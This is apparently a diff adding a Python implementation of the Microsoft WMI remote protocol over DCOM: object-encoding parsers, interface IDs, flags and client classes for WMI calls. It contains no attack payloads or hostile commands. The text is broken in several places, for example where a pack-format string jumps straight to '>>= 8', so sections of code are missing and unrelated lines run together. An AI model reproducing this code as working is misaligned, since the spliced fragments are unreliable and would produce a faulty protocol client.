+ cHeap = self['ClassPart']['ClassHeap']['HeapItem']
+ if pClassName == 0xffffffff:
+ return 'None'
+ else:
+ className = ENCODED_STRING(cHeap[pClassName:])['Character']
+ derivationList = self['ClassPart']['DerivationList']['ClassNameEncoding']
+ while len(derivationList) > 0:
+ superClass = ENCODED_STRING(derivationList)['Character']
+ className += ' : %s ' % superClass
+ derivationList = derivationList[len(ENCODED_STRING(derivationList))+4:]
+ return className
+
+ def getQualifiers(self):
+ return self["ClassPart"].getQualifiers()
+
+ def getProperties(self):
+ #print format_structure(self["ClassPart"].getProperties())
+ return self["ClassPart"].getProperties()
+
+ def getMethods(self):
+ return self["MethodsPart"].getMethods()
+
+# 2.2.13 CurrentClass
+CURRENT_CLASS = CLASS_AND_METHODS_PART
+
+# 2.2.54 InstanceFlags
+INSTANCE_FLAGS = 'B=0'
+
+# 2.2.55 InstanceClassName
+INSTANCE_CLASS_NAME = HEAP_STRING_REF
+
+# 2.2.27 NullAndDefaultFlag
+NULL_AND_DEFAULT_FLAG = 'B=0'
+
+# 2.2.26 NdTable
+NDTABLE = NULL_AND_DEFAULT_FLAG
+
+# 2.2.56 InstanceData
+#InstanceData = ValueTable
+
+class CURRENT_CLASS_NO_METHODS(CLASS_AND_METHODS_PART):
+ structure = (
+ ('ClassPart', ':', CLASS_PART),
+ )
+ def getMethods(self):
+ return ()
+
+# 2.2.65 InstancePropQualifierSet
+INST_PROP_QUAL_SET_FLAG = 'B=0'
+class INSTANCE_PROP_QUALIFIER_SET(Structure):
+ commonHdr = (
+ ('InstPropQualSetFlag', INST_PROP_QUAL_SET_FLAG),
+ )
+ tail = (
+ # ToDo: this is wrong.. this should be an array of QualifierSet, see documentation
+ #('QualifierSet', ':', QualifierSet),
+ ('QualifierSet', ':', QUALIFIER_SET),
+ )
+
+ def __init__(self, data = None, alignment = 0):
+ Structure.__init__(self, data, alignment)
+ self.structure = ()
+ if data is not None:
+ # Let's first check the commonHdr
+ self.fromString(data)
+ if self['InstPropQualSetFlag'] == 2:
+ # We don't support this yet!
+ raise Exception("self['InstPropQualSetFlag'] == 2")
+ self.fromString(data)
+ else:
+ self.data = None
+
+# 2.2.57 InstanceQualifierSet
+class INSTANCE_QUALIFIER_SET(Structure):
+ structure = (
+ ('QualifierSet', ':', QUALIFIER_SET),
+ ('InstancePropQualifierSet', ':', INSTANCE_PROP_QUALIFIER_SET),
+ )
+
+# 2.2.58 InstanceHeap
+INSTANCE_HEAP = HEAP
+
+# 2.2.53 InstanceType
+class INSTANCE_TYPE(Structure):
+ commonHdr = (
+ ('CurrentClass', ':', CURRENT_CLASS_NO_METHODS),
+ ('EncodingLength', ENCODING_LENGTH),
+ ('InstanceFlags', INSTANCE_FLAGS),
+ ('InstanceClassName', INSTANCE_CLASS_NAME),
+ ('_NdTable_ValueTable', '_-NdTable_ValueTable',
+ 'self["CurrentClass"]["ClassPart"]["ClassHeader"]["NdTableValueTableLength"]'),
+ ('NdTable_ValueTable',':'),
+ ('InstanceQualifierSet', ':', INSTANCE_QUALIFIER_SET),
+ ('InstanceHeap', ':', INSTANCE_HEAP),
+ )
+
+ def __init__(self, data = None, alignment = 0):
+ Structure.__init__(self, data, alignment)
+ self.structure = ()
+ if data is not None:
+ # Let's first check the commonHdr
+ self.fromString(data)
+ #hexdump(data[len(self.getData()):])
+ self.NdTableSize = (self['CurrentClass']['ClassPart']['PropertyLookupTable']['PropertyCount'] - 1) //4 + 1
+ #self.InstanceDataSize = self['CurrentClass']['ClassPart']['PropertyLookupTable']['PropertyCount'] * len(InstanceData())
+ self.fromString(data)
+ else:
+ self.data = None
+
+ def getValues(self, properties):
+ heap = self["InstanceHeap"]["HeapItem"]
+ valueTableOff = (len(properties) - 1) // 4 + 1
+ valueTable = self['NdTable_ValueTable'][valueTableOff:]
+ sorted_props = sorted(list(properties.keys()), key=lambda k: properties[k]['order'])
+ for key in sorted_props:
+ pType = properties[key]['type'] & (~(CIM_ARRAY_FLAG|Inherited))
+ if properties[key]['type'] & CIM_ARRAY_FLAG:
+ unpackStr = HEAPREF[:-2]
+ else:
+ unpackStr = CIM_TYPES_REF[pType][:-2]
+ dataSize = calcsize(unpackStr)
+ try:
+ itemValue = unpack(unpackStr, valueTable[:dataSize])[0]
+ except:
+ LOG.error("getValues: Error Unpacking!")
+ itemValue = 0xffffffff
+
+ # if itemValue == 0, default value remains
+ if itemValue != 0:
+ value = ENCODED_VALUE.getValue( properties[key]['type'], itemValue, heap)
+ properties[key]['value'] = value
+ # is the value set valid or should we clear it? ( if not inherited )
+ elif properties[key]['inherited'] == 0:
+ properties[key]['value'] = None
+ valueTable = valueTable[dataSize:]
+ return properties
+
+# 2.2.12 ParentClass
+PARENT_CLASS = CLASS_AND_METHODS_PART
+
+# 2.2.13 CurrentClass
+CURRENT_CLASS = CLASS_AND_METHODS_PART
+
+class CLASS_TYPE(Structure):
+ structure = (
+ ('ParentClass', ':', PARENT_CLASS),
+ ('CurrentClass', ':', CURRENT_CLASS),
+ )
+
+# 2.2.5 ObjectBlock
+class OBJECT_BLOCK(Structure):
+ commonHdr = (
+ ('ObjectFlags', OBJECT_FLAGS),
+ )
+
+ decoration = (
+ ('Decoration', ':', DECORATION),
+ )
+
+ instanceType = (
+ ('InstanceType', ':', INSTANCE_TYPE),
+ )
+
+ classType = (
+ ('ClassType', ':', CLASS_TYPE),
+ )
+ def __init__(self, data = None, alignment = 0):
+ Structure.__init__(self, data, alignment)
+ self.ctParent = None
+ self.ctCurrent = None
+
+ if data is not None:
+ self.structure = ()
+ if ord(data[0:1]) & 0x4:
+ # WMIO - 2.2.6 - 0x04 If this flag is set, the object has a Decoration block.
+ self.structure += self.decoration
+ if ord(data[0:1]) & 0x01:
+ # The object is a CIM class.
+ self.structure += self.classType
+ else:
+ self.structure += self.instanceType
+
+ self.fromString(data)
+ else:
+ self.data = None
+
+ def isInstance(self):
+ if self['ObjectFlags'] & 0x01:
+ return False
+ return True
+
+ def printClass(self, pClass, cInstance = None):
+ qualifiers = pClass.getQualifiers()
+
+ for qualifier in qualifiers:
+ print("[%s]" % qualifier)
+
+ className = pClass.getClassName()
+
+ print("class %s \n{" % className)
+
+ properties = pClass.getProperties()
+ if cInstance is not None:
+ properties = cInstance.getValues(properties)
+
+ for pName in properties:
+ #if property['inherited'] == 0:
+ qualifiers = properties[pName]['qualifiers']
+ for qName in qualifiers:
+ if qName != 'CIMTYPE':
+ print('\t[%s(%s)]' % (qName, qualifiers[qName]))
+ print("\t%s %s" % (properties[pName]['stype'], properties[pName]['name']), end=' ')
+ if properties[pName]['value'] is not None:
+ if properties[pName]['type'] == CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value:
+ print('= IWbemClassObject\n')
+ elif properties[pName]['type'] == CIM_TYPE_ENUM.CIM_ARRAY_OBJECT.value:
+ if properties[pName]['value'] == 0:
+ print('= %s\n' % properties[pName]['value'])
+ else:
+ print('= %s\n' % list('IWbemClassObject' for _ in range(len(properties[pName]['value']))))
+ else:
+ print('= %s\n' % properties[pName]['value'])
+ else:
+ print('\n')
+
+ print()
+ methods = pClass.getMethods()
+ for methodName in methods:
+ for qualifier in methods[methodName]['qualifiers']:
+ print('\t[%s]' % qualifier)
+
+ if methods[methodName]['InParams'] is None and methods[methodName]['OutParams'] is None:
+ print('\t%s %s();\n' % ('void', methodName))
+ if methods[methodName]['InParams'] is None and len(methods[methodName]['OutParams']) == 1:
+ print('\t%s %s();\n' % (methods[methodName]['OutParams']['ReturnValue']['stype'], methodName))
+ else:
+ returnValue = b''
+ if methods[methodName]['OutParams'] is not None:
+ # Search the Return Value
+ #returnValue = (item for item in method['OutParams'] if item["name"] == "ReturnValue").next()
+ if 'ReturnValue' in methods[methodName]['OutParams']:
+ returnValue = methods[methodName]['OutParams']['ReturnValue']['stype']
+
+ print('\t%s %s(\n' % (returnValue, methodName), end=' ')
+ if methods[methodName]['InParams'] is not None:
+ for pName in methods[methodName]['InParams']:
+ print('\t\t[in] %s %s,' % (methods[methodName]['InParams'][pName]['stype'], pName))
+
+ if methods[methodName]['OutParams'] is not None:
+ for pName in methods[methodName]['OutParams']:
+ if pName != 'ReturnValue':
+ print('\t\t[out] %s %s,' % (methods[methodName]['OutParams'][pName]['stype'], pName))
+
+ print('\t);\n')
+
+ print("}")
+
+ def parseClass(self, pClass, cInstance = None):
+ classDict = OrderedDict()
+ classDict['name'] = pClass.getClassName()
+ classDict['qualifiers'] = pClass.getQualifiers()
+ classDict['properties'] = pClass.getProperties()
+ classDict['methods'] = pClass.getMethods()
+ if cInstance is not None:
+ classDict['values'] = cInstance.getValues(classDict['properties'])
+ else:
+ classDict['values'] = None
+
+ return classDict
+
+ def parseObject(self):
+ if (self['ObjectFlags'] & 0x01) == 0:
+ # instance
+ ctCurrent = self['InstanceType']['CurrentClass']
+ currentName = ctCurrent.getClassName()
+ if currentName is not None:
+ self.ctCurrent = self.parseClass(ctCurrent, self['InstanceType'])
+ return
+ else:
+ ctParent = self['ClassType']['ParentClass']
+ ctCurrent = self['ClassType']['CurrentClass']
+
+ parentName = ctParent.getClassName()
+ if parentName is not None:
+ self.ctParent = self.parseClass(ctParent)
+
+ currentName = ctCurrent.getClassName()
+ if currentName is not None:
+ self.ctCurrent = self.parseClass(ctCurrent)
+
+ def printInformation(self):
+ # First off, do we have a class?
+ if (self['ObjectFlags'] & 0x01) == 0:
+ # instance
+ ctCurrent = self['InstanceType']['CurrentClass']
+ currentName = ctCurrent.getClassName()
+ if currentName is not None:
+ self.printClass(ctCurrent, self['InstanceType'])
+ return
+ else:
+ ctParent = self['ClassType']['ParentClass']
+ ctCurrent = self['ClassType']['CurrentClass']
+
+ parentName = ctParent.getClassName()
+ if parentName is not None:
+ self.printClass(ctParent)
+
+ currentName = ctCurrent.getClassName()
+ if currentName is not None:
+ self.printClass(ctCurrent)
+
+# 2.2.70 MethodSignatureBlock
+class METHOD_SIGNATURE_BLOCK(Structure):
+ commonHdr = (
+ ('EncodingLength', ENCODING_LENGTH),
+ )
+ tail = (
+ ('_ObjectBlock', '_-ObjectBlock', 'self["EncodingLength"]'),
+ ('ObjectBlock', ':', OBJECT_BLOCK),
+ )
+ def __init__(self, data = None, alignment = 0):
+ Structure.__init__(self, data, alignment)
+ if data is not None:
+ self.fromString(data)
+ if self['EncodingLength'] > 0:
+ self.structure = ()
+ self.structure += self.tail
+ self.fromString(data)
+ else:
+ self.data = None
+
+# 2.2.1 EncodingUnit
+class ENCODING_UNIT(Structure):
+ structure = (
+ ('Signature', SIGNATURE),
+ ('ObjectEncodingLength', OBJECT_ENCODING_LENGTH),
+ ('_ObjectBlock', '_-ObjectBlock', 'self["ObjectEncodingLength"]'),
+ ('ObjectBlock', ':', OBJECT_BLOCK),
+ )
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 1.9 Standards Assignments
+CLSID_WbemLevel1Login = string_to_bin('8BC3F05E-D86B-11D0-A075-00C04FB68820')
+CLSID_WbemBackupRestore = string_to_bin('C49E32C6-BC8B-11D2-85D4-00105A1F8304')
+CLSID_WbemClassObject = string_to_bin('4590F812-1D3A-11D0-891F-00AA004B2E24')
+
+IID_IWbemLevel1Login = uuidtup_to_bin(('F309AD18-D86A-11d0-A075-00C04FB68820', '0.0'))
+IID_IWbemLoginClientID = uuidtup_to_bin(('d4781cd6-e5d3-44df-ad94-930efe48a887', '0.0'))
+IID_IWbemLoginHelper = uuidtup_to_bin(('541679AB-2E5F-11d3-B34E-00104BCC4B4A', '0.0'))
+IID_IWbemServices = uuidtup_to_bin(('9556DC99-828C-11CF-A37E-00AA003240C7', '0.0'))
+IID_IWbemBackupRestore = uuidtup_to_bin(('C49E32C7-BC8B-11d2-85D4-00105A1F8304', '0.0'))
+IID_IWbemBackupRestoreEx = uuidtup_to_bin(('A359DEC5-E813-4834-8A2A-BA7F1D777D76', '0.0'))
+IID_IWbemClassObject = uuidtup_to_bin(('DC12A681-737F-11CF-884D-00AA004B2E24', '0.0'))
+IID_IWbemContext = uuidtup_to_bin(('44aca674-e8fc-11d0-a07c-00c04fb68820', '0.0'))
+IID_IEnumWbemClassObject = uuidtup_to_bin(('027947e1-d731-11ce-a357-000000000001', '0.0'))
+IID_IWbemCallResult = uuidtup_to_bin(('44aca675-e8fc-11d0-a07c-00c04fb68820', '0.0'))
+IID_IWbemFetchSmartEnum = uuidtup_to_bin(('1C1C45EE-4395-11d2-B60B-00104B703EFD', '0.0'))
+IID_IWbemWCOSmartEnum = uuidtup_to_bin(('423EC01E-2E35-11d2-B604-00104B703EFD', '0.0'))
+
+error_status_t = ULONG
+
+# lFlags
+WBEM_FLAG_RETURN_WBEM_COMPLETE = 0x00000000
+WBEM_FLAG_UPDATE_ONLY = 0x00000001
+WBEM_FLAG_CREATE_ONLY = 0x00000002
+WBEM_FLAG_RETURN_IMMEDIATELY = 0x00000010
+WBEM_FLAG_UPDATE_SAFE_MODE = 0x00000020
+WBEM_FLAG_FORWARD_ONLY = 0x00000020
+WBEM_FLAG_NO_ERROR_OBJECT = 0x00000040
+WBEM_FLAG_UPDATE_FORCE_MODE = 0x00000040
+WBEM_FLAG_SEND_STATUS = 0x00000080
+WBEM_FLAG_ENSURE_LOCATABLE = 0x00000100
+WBEM_FLAG_DIRECT_READ = 0x00000200
+WBEM_MASK_RESERVED_FLAGS = 0x0001F000
+WBEM_FLAG_USE_AMENDED_QUALIFIERS = 0x00020000
+WBEM_FLAG_STRONG_VALIDATION = 0x00100000
+WBEM_FLAG_BACKUP_RESTORE_FORCE_SHUTDOWN = 0x00000001
+
+WBEM_INFINITE = 0xffffffff
+
+################################################################################
+# STRUCTURES
+################################################################################
+class UCHAR_ARRAY_CV(NDRUniConformantVaryingArray):
+ item = 'c'
+
+class PUCHAR_ARRAY_CV(NDRPOINTER):
+ referent = (
+ ('Data', UCHAR_ARRAY_CV),
+ )
+
+class PMInterfacePointer_ARRAY_CV(NDRUniConformantVaryingArray):
+ item = PMInterfacePointer
+
+REFGUID = PGUID
+
+class ULONG_ARRAY(NDRUniConformantArray):
+ item = ULONG
+
+class PULONG_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', ULONG_ARRAY),
+ )
+
+# 2.2.5 WBEM_CHANGE_FLAG_TYPE Enumeration
+class WBEM_CHANGE_FLAG_TYPE(NDRENUM):
+ # [v1_enum] type
+ structure = (
+ ('Data', '>= 8
+
+ # Now let's update the structure
+ objRef = self.get_objRef()
+ objRef = OBJREF_CUSTOM(objRef)
+ encodingUnit = ENCODING_UNIT(objRef['pObjectData'])
+
+ currentClass = encodingUnit['ObjectBlock']['InstanceType']['CurrentClass']
+ encodingUnit['ObjectBlock']['InstanceType']['CurrentClass'] = b''
+
+ encodingUnit['ObjectBlock']['InstanceType']['NdTable_ValueTable'] = packedNdTable + valueTable
+ encodingUnit['ObjectBlock']['InstanceType']['InstanceHeap']['HeapLength'] = len(instanceHeap) | 0x80000000
+ encodingUnit['ObjectBlock']['InstanceType']['InstanceHeap']['HeapItem'] = instanceHeap
+
+ encodingUnit['ObjectBlock']['InstanceType']['EncodingLength'] = len(encodingUnit['ObjectBlock']['InstanceType'])
+ encodingUnit['ObjectBlock']['InstanceType']['CurrentClass'] = currentClass
+
+ encodingUnit['ObjectEncodingLength'] = len(encodingUnit['ObjectBlock'])
+
+ #encodingUnit.dump()
+ #ENCODING_UNIT(str(encodingUnit)).dump()
+
+ objRef['pObjectData'] = encodingUnit
+
+ return objRef
+
+ def SpawnInstance(self):
+ # Doing something similar to:
+ # https://docs.microsoft.com/windows/desktop/api/wbemcli/nf-wbemcli-iwbemclassobject-spawninstance
+ #
+ if self.encodingUnit['ObjectBlock'].isInstance() is False:
+ # We need to convert some things to transform a class into an instance
+ encodingUnit = ENCODING_UNIT()
+
+ instanceData = OBJECT_BLOCK()
+ instanceData.structure += OBJECT_BLOCK.decoration
+ instanceData.structure += OBJECT_BLOCK.instanceType
+ instanceData['ObjectFlags'] = 6
+ instanceData['Decoration'] = self.encodingUnit['ObjectBlock']['Decoration'].getData()
+
+ instanceType = INSTANCE_TYPE()
+ instanceType['CurrentClass'] = b''
+
+ # Let's create the heap for the parameters
+ instanceHeap = b''
+ valueTable = b''
+ parametersClass = ENCODED_STRING()
+ parametersClass['Character'] = self.getClassName()
+ instanceHeap += parametersClass.getData()
+ curHeapPtr = len(instanceHeap)
+
+ ndTable = 0
+ properties = self.getProperties()
+
+ # Let's initialize the values
+ for i, propName in enumerate(properties):
+ propRecord = properties[propName]
+
+ pType = propRecord['type'] & (~(CIM_ARRAY_FLAG|Inherited))
+ if propRecord['type'] & CIM_ARRAY_FLAG:
+ # Not yet ready
+ #print paramDefinition
+ #raise
+ packStr = HEAPREF[:-2]
+ else:
+ packStr = CIM_TYPES_REF[pType][:-2]
+
+ if propRecord['type'] & CIM_ARRAY_FLAG:
+ valueTable += pack(packStr, 0)
+ elif pType not in (CIM_TYPE_ENUM.CIM_TYPE_STRING.value, CIM_TYPE_ENUM.CIM_TYPE_DATETIME.value,
+ CIM_TYPE_ENUM.CIM_TYPE_REFERENCE.value, CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value):
+ valueTable += pack(packStr, 0)
+ elif pType == CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value:
+ # For now we just pack None
+ valueTable += b'\x00'*4
+ # The default property value is NULL, and it is
+ # inherited from a parent class.
+ ndTable |= 3 << (2*i)
+ else:
+ strIn = ENCODED_STRING()
+ strIn['Character'] = ''
+ valueTable += pack('>= 8
+
+ instanceType['NdTable_ValueTable'] = packedNdTable + valueTable
+
+ instanceType['InstanceQualifierSet'] = b'\x04\x00\x00\x00\x01'
+
+ instanceType['InstanceHeap'] = HEAP()
+ instanceType['InstanceHeap']['HeapItem'] = instanceHeap
+ instanceType['InstanceHeap']['HeapLength'] = len(instanceHeap) | 0x80000000
+ instanceType['EncodingLength'] = len(instanceType)
+
+ instanceType['CurrentClass'] = self.encodingUnit['ObjectBlock']['ClassType']['CurrentClass']['ClassPart']
+ instanceData['InstanceType'] = instanceType.getData()
+
+ encodingUnit['ObjectBlock'] = instanceData
+ encodingUnit['ObjectEncodingLength'] = len(instanceData)
+
+ #ENCODING_UNIT(str(encodingUnit)).dump()
+
+ objRefCustomIn = OBJREF_CUSTOM()
+ objRefCustomIn['iid'] = self._iid
+ objRefCustomIn['clsid'] = CLSID_WbemClassObject
+ objRefCustomIn['cbExtension'] = 0
+ objRefCustomIn['ObjectReferenceSize'] = len(encodingUnit)
+ objRefCustomIn['pObjectData'] = encodingUnit
+
+ # There's gotta be a better way to do this
+ # I will reimplement this stuff once I know it works
+ import copy
+ newObj = copy.deepcopy(self)
+ newObj.set_objRef(objRefCustomIn.getData())
+ newObj.process_interface(objRefCustomIn.getData())
+ newObj.encodingUnit = ENCODING_UNIT(encodingUnit.getData())
+ newObj.parseObject()
+ if newObj.encodingUnit['ObjectBlock'].isInstance() is False:
+ newObj.createMethods(newObj.getClassName(), newObj.getMethods())
+ else:
+ newObj.createProperties(newObj.getProperties())
+
+ return newObj
+ else:
+ return self
+
+ def createProperties(self, properties):
+ for property in properties:
+ # Do we have an object property?
+ if properties[property]['type'] == CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value:
+ # Yes.. let's create an Object for it too
+ objRef = OBJREF_CUSTOM()
+ objRef['iid'] = self._iid
+ objRef['clsid'] = CLSID_WbemClassObject
+ objRef['cbExtension'] = 0
+ objRef['ObjectReferenceSize'] = len(properties[property]['value'].getData())
+ objRef['pObjectData'] = properties[property]['value']
+ value = IWbemClassObject( INTERFACE(self.get_cinstance(), objRef.getData(), self.get_ipidRemUnknown(),
+ oxid=self.get_oxid(), target=self.get_target()))
+ elif properties[property]['type'] == CIM_TYPE_ENUM.CIM_ARRAY_OBJECT.value:
+ if isinstance(properties[property]['value'], list):
+ value = list()
+ for item in properties[property]['value']:
+ # Yes.. let's create an Object for it too
+ objRef = OBJREF_CUSTOM()
+ objRef['iid'] = self._iid
+ objRef['clsid'] = CLSID_WbemClassObject
+ objRef['cbExtension'] = 0
+ objRef['ObjectReferenceSize'] = len(item.getData())
+ objRef['pObjectData'] = item
+ wbemClass = IWbemClassObject(
+ INTERFACE(self.get_cinstance(), objRef.getData(), self.get_ipidRemUnknown(),
+ oxid=self.get_oxid(), target=self.get_target()))
+ value.append(wbemClass)
+ else:
+ value = properties[property]['value']
+ else:
+ value = properties[property]['value']
+ setattr(self, property, value)
+
+ def createMethods(self, classOrInstance, methods):
+ class FunctionPool:
+ def __init__(self,function):
+ self.function = function
+ def __getitem__(self,item):
+ return partial(self.function,item)
+
+ @FunctionPool
+ def innerMethod(staticArgs, *args):
+ classOrInstance = staticArgs[0]
+ methodDefinition = staticArgs[1]
+ if methodDefinition['InParams'] is not None:
+ if len(args) != len(methodDefinition['InParams']):
+ LOG.error("Function called with %d parameters instead of %d!" % (len(args), len(methodDefinition['InParams'])))
+ return None
+ # In Params
+ encodingUnit = ENCODING_UNIT()
+
+ inParams = OBJECT_BLOCK()
+ inParams.structure += OBJECT_BLOCK.instanceType
+ inParams['ObjectFlags'] = 2
+ inParams['Decoration'] = b''
+
+ instanceType = INSTANCE_TYPE()
+ instanceType['CurrentClass'] = b''
+ instanceType['InstanceQualifierSet'] = b'\x04\x00\x00\x00\x01'
+
+ # Let's create the heap for the parameters
+ instanceHeap = b''
+ valueTable = b''
+ parametersClass = ENCODED_STRING()
+ parametersClass['Character'] = '__PARAMETERS'
+ instanceHeap += parametersClass.getData()
+ curHeapPtr = len(instanceHeap)
+
+ ndTable = 0
+ for i in range(len(args)):
+ paramDefinition = list(methodDefinition['InParams'].values())[i]
+ inArg = args[i]
+
+ pType = paramDefinition['type'] & (~(CIM_ARRAY_FLAG|Inherited))
+ if paramDefinition['type'] & CIM_ARRAY_FLAG:
+ # Not yet ready
+ #print paramDefinition
+ #raise
+ packStr = HEAPREF[:-2]
+ else:
+ packStr = CIM_TYPES_REF[pType][:-2]
+
+ if paramDefinition['type'] & CIM_ARRAY_FLAG:
+ if inArg is None:
+ valueTable += pack(packStr, 0)
+ elif pType in (CIM_TYPE_ENUM.CIM_TYPE_STRING.value, CIM_TYPE_ENUM.CIM_TYPE_DATETIME.value,
+ CIM_TYPE_ENUM.CIM_TYPE_REFERENCE.value, CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value):
+ arraySize = pack(HEAPREF[:-2], len(inArg))
+ arrayItems = []
+ for j in range(len(inArg)):
+ curVal = inArg[j]
+ if pType == CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value:
+ curObject = b''
+ marshaledObject = curVal.marshalMe()
+ curObject += pack('>= 8
+
+ instanceType['NdTable_ValueTable'] = packedNdTable + valueTable
+ heapRecord = HEAP()
+ heapRecord['HeapLength'] = len(instanceHeap) | 0x80000000
+ heapRecord['HeapItem'] = instanceHeap
+
+ instanceType['InstanceHeap'] = heapRecord
+
+ instanceType['EncodingLength'] = len(instanceType)
+ inMethods = methodDefinition['InParamsRaw']['ClassType']['CurrentClass']['ClassPart']
+ inMethods['ClassHeader']['EncodingLength'] = len(
+ methodDefinition['InParamsRaw']['ClassType']['CurrentClass']['ClassPart'].getData())
+ instanceType['CurrentClass'] = inMethods
+
+ inParams['InstanceType'] = instanceType.getData()
+
+ encodingUnit['ObjectBlock'] = inParams
+ encodingUnit['ObjectEncodingLength'] = len(inParams)
+
+ objRefCustomIn = OBJREF_CUSTOM()
+ objRefCustomIn['iid'] = self._iid
+ objRefCustomIn['clsid'] = CLSID_WbemClassObject
+ objRefCustomIn['cbExtension'] = 0
+ objRefCustomIn['ObjectReferenceSize'] = len(encodingUnit)
+ objRefCustomIn['pObjectData'] = encodingUnit
+ else:
+ objRefCustomIn = NULL
+
+ ### OutParams
+ encodingUnit = ENCODING_UNIT()
+
+ outParams = OBJECT_BLOCK()
+ outParams.structure += OBJECT_BLOCK.instanceType
+ outParams['ObjectFlags'] = 2
+ outParams['Decoration'] = b''
+
+ instanceType = INSTANCE_TYPE()
+ instanceType['CurrentClass'] = b''
+ instanceType['NdTable_ValueTable'] = b''
+ instanceType['InstanceQualifierSet'] = b''
+ instanceType['InstanceHeap'] = b''
+ instanceType['EncodingLength'] = len(instanceType)
+ instanceType['CurrentClass'] = methodDefinition['OutParamsRaw']['ClassType']['CurrentClass']['ClassPart'].getData()
+ outParams['InstanceType'] = instanceType.getData()
+
+
+ encodingUnit['ObjectBlock'] = outParams
+ encodingUnit['ObjectEncodingLength'] = len(outParams)
+
+ objRefCustom = OBJREF_CUSTOM()
+ objRefCustom['iid'] = self._iid
+ objRefCustom['clsid'] = CLSID_WbemClassObject
+ objRefCustom['cbExtension'] = 0
+ objRefCustom['ObjectReferenceSize'] = len(encodingUnit)
+ objRefCustom['pObjectData'] = encodingUnit
+ try:
+ return self.__iWbemServices.ExecMethod(classOrInstance, methodDefinition['name'], pInParams = objRefCustomIn )
+ #return self.__iWbemServices.ExecMethod('Win32_Process.Handle="436"', methodDefinition['name'],
+ # pInParams=objRefCustomIn).getObject().ctCurrent['properties']
+ except Exception as e:
+ if LOG.level == logging.DEBUG:
+ import traceback
+ traceback.print_exc()
+ LOG.error(str(e))
+
+ for methodName in methods:
+ innerMethod.__name__ = methodName
+ setattr(self,innerMethod.__name__,innerMethod[classOrInstance,methods[methodName]])
+ #methods = self.encodingUnit['ObjectBlock']
+
+
+class IWbemLoginClientID(IRemUnknown):
+ def __init__(self, interface):
+ IRemUnknown.__init__(self,interface)
+ self._iid = IID_IWbemLoginClientID
+
+ def SetClientInfo(self, wszClientMachine, lClientProcId = 1234):
+ request = IWbemLoginClientID_SetClientInfo()
+ request['wszClientMachine'] = checkNullString(wszClientMachine)
+ request['lClientProcId'] = lClientProcId
+ request['lReserved'] = 0
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return resp
+
+class IWbemLoginHelper(IRemUnknown):
+ def __init__(self, interface):
+ IRemUnknown.__init__(self,interface)
+ self._iid = IID_IWbemLoginHelper
+
+ def SetEvent(self, sEventToSet):
+ request = IWbemLoginHelper_SetEvent()
+ request['sEventToSet'] = sEventToSet
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+
+class IWbemWCOSmartEnum(IRemUnknown):
+ def __init__(self, interface):
+ IRemUnknown.__init__(self,interface)
+ self._iid = IID_IWbemWCOSmartEnum
+
+ def Next(self, proxyGUID, lTimeout, uCount):
+ request = IWbemWCOSmartEnum_Next()
+ request['proxyGUID'] = proxyGUID
+ request['lTimeout'] = lTimeout
+ request['uCount'] = uCount
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+class IWbemFetchSmartEnum(IRemUnknown):
+ def __init__(self, interface):
+ IRemUnknown.__init__(self,interface)
+ self._iid = IID_IWbemFetchSmartEnum
+
+ def GetSmartEnum(self, lTimeout):
+ request = IWbemFetchSmartEnum_GetSmartEnum()
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+class IWbemCallResult(IRemUnknown):
+ def __init__(self, interface):
+ IRemUnknown.__init__(self,interface)
+ self._iid = IID_IWbemCallResult
+
+ def GetResultObject(self, lTimeout):
+ request = IWbemCallResult_GetResultObject()
+ request['lTimeout'] = lTimeout
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def GetResultString(self, lTimeout):
+ request = IWbemCallResult_GetResultString()
+ request['lTimeout'] = lTimeout
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def GetResultServices(self, lTimeout):
+ request = IWbemCallResult_GetResultServices()
+ request['lTimeout'] = lTimeout
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def GetCallStatus(self, lTimeout):
+ request = IWbemCallResult_GetCallStatus()
+ request['lTimeout'] = lTimeout
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return resp['plStatus']
+
+class IEnumWbemClassObject(IRemUnknown):
+ def __init__(self, interface, iWbemServices = None):
+ IRemUnknown.__init__(self,interface)
+ self._iid = IID_IEnumWbemClassObject
+ self.__iWbemServices = iWbemServices
+
+ def Reset(self):
+ request = IEnumWbemClassObject_Reset()
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def Next(self, lTimeout, uCount):
+ request = IEnumWbemClassObject_Next()
+ request['lTimeout'] = lTimeout
+ request['uCount'] = uCount
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ interfaces = list()
+ for interface in resp['apObjects']:
+ interfaces.append(IWbemClassObject(
+ INTERFACE(self.get_cinstance(), b''.join(interface['abData']), self.get_ipidRemUnknown(),
+ oxid=self.get_oxid(), target=self.get_target()), self.__iWbemServices))
+
+ return interfaces
+
+ def NextAsync(self, lTimeout, pSink):
+ request = IEnumWbemClassObject_NextAsync()
+ request['lTimeout'] = lTimeout
+ request['pSink'] = pSink
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def Clone(self):
+ request = IEnumWbemClassObject_Clone()
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+ def Skip(self, lTimeout, uCount):
+ request = IEnumWbemClassObject_Skip()
+ request['lTimeout'] = lTimeout
+ request['uCount'] = uCount
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ resp.dump()
+ return resp
+
+class IWbemServices(IRemUnknown):
+ def __init__(self, interface):
+ IRemUnknown.__init__(self,interface)
+ self._iid = IID_IWbemServices
+
+ def OpenNamespace(self, strNamespace, lFlags=0, pCtx = NULL):
